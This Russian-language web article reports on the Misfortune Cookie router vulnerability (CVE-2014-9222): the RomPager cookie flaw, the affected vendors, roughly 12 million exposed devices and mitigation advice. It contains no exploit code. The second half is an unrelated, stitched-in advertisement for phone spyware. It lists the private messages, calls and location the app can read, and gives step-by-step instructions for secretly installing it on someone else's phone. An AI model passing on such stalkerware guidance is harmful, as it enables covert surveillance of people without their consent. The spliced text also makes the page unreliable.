Misfortune Cookie – серьёзная уязвимость маршрутизаторов

023Фатальная уязвимость обнаружена компанией Check Point Software Technologies, отчёт опубликован на её официальном сайте. Колоссальные возможности бреши Misfortune Cookie позволяют получить доступ к миллионам и миллионам устройств по всему миру.

Код ошибки — CVE-2014-9222, она позволяет удалённо получать доступ к различным типам сетевых устройств, без привязки к конкретному производителю. Появлялась возможность использовать административные привилегии, позволяя добираться до любой машины в рамках сетевого окружения.

Ошибка затрагивает протокол HTTP, она позволяет сформировать особый файл типа cookie, в котором располагается информация о доступе к нужным устройствам. При этом вызывается комплексное нарушение памяти, в итоге злоумышленник сможет контролировать практически любые компьютеры. Административные привилегии не получится закрыть обычными способами, воспользовавшись аккаунтом администратора. Поэтому остаётся надеяться на оперативное устранение подобной неисправности на уровне производителей оборудования.

В списке моделей, где данная брешь обнаружена, называют около 200 моделей. Ведущие производители D-Link, Edimax, Huawei, TP-Link, ZTE, ZyXEL имеют одинаковую ошибку. Веб-сервер RomPager имеет серьёзные ограничения и массу дополнительных проблем. Исследователи подсчитали, что на текущий момент под уязвимые устройства попадает примерно 12 миллионов единиц!

Что самое интересное, вины производителей RomPager в этом фактически нет, поскольку ошибка была исправлена ещё в 2005 году. Однако производители сетевого оборудования, в большинстве своём, проигнорировали это. Если у пользователя есть определённые знания в этой области, всегда можно установить обновлённый вариант прошивки. Всем остальным рекомендуется подключить защищённый сетевой экран, а также использовать уязвимые модели в качестве дополнительного моста, расположенного между сетевым окружением и маршрутизатором.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.